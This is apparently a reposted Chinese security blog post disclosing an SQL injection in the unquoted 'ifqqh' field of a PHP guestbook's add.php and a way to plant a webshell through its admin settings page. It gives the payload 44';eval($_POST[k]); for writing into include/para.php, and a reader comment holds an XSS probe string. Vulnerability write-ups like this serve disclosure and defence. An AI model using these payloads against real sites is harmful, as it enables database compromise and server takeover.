迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

admin 2021年4月3日19:38:11评论67 views字数 63阅读0分12秒阅读模式

    By:毅心毅意

    下载地址:http://down.chinaz.com/soft/29982.htm

add.php:

                 if($_POST['unum']==$_SESSION["randValid"]){
                        $username=addslashes(htmlspecialchars($_POST['username']));
                        $email=addslashes(htmlspecialchars($_POST['email']));
                        $content=addslashes(htmlspecialchars($_POST['content']));
                        $userip=$_SERVER["REMOTE_ADDR"];
                        $ifqqh=$_POST["ifqqh"];
                        if(empty($ifqqh)) $ifqqh=0;
                        $systime=date("Y-m-d H:i:s");
                        if(!empty($content) or !empty($username)){
                        $ifshow="";
                        //还原空格和回车
                        if(!empty($content)){
                                $content=str_replace(" ","",$content);
                                $content=ereg_replace("n","
  ",ereg_replace(" "," ",$content));
                        }
                        if($ifauditing==1){$ifshow=0;}else{$ifshow=1;}
                        //还原结束
                        $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";
                        //echo $sql;

$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";$ifqqh没有用   '  来包含。不受magic_quotes_gpc影响

Exp:

*

*

提交前请按Ctrl+C保存留言内容,以免程序出错而丢失!
留言内容不能少于5个字符!



 当选中时,此留言只有管理员可见



    进入后台

迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

admin_set.php:

// write the para file
$filenum = fopen ("include/para.php","w");
ftruncate($filenum, 0);
fwrite($filenum, $parafile);
fclose($filenum);
        echo "设置已保存,请稍候……
如果浏览器没有自动返回,请点击此处返回";
        echo "";
?>

    可以写入:include/para.php,写入:44';eval($_POST[k]);,即可。

迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

    因为用了 ' 包含,所以会受 magic_quotes_gpc 影响。

留言评论(旧系统):

佚名 @ 2013-03-28 20:00:36

a.jsp/scriptalert(Vulnerable)/script

本站回复:

╮(╯_╰)╭

文章来源于lcx.cc:迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:38:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShellhttps://cn-sec.com/archives/324063.html

发表评论

匿名网友 填写信息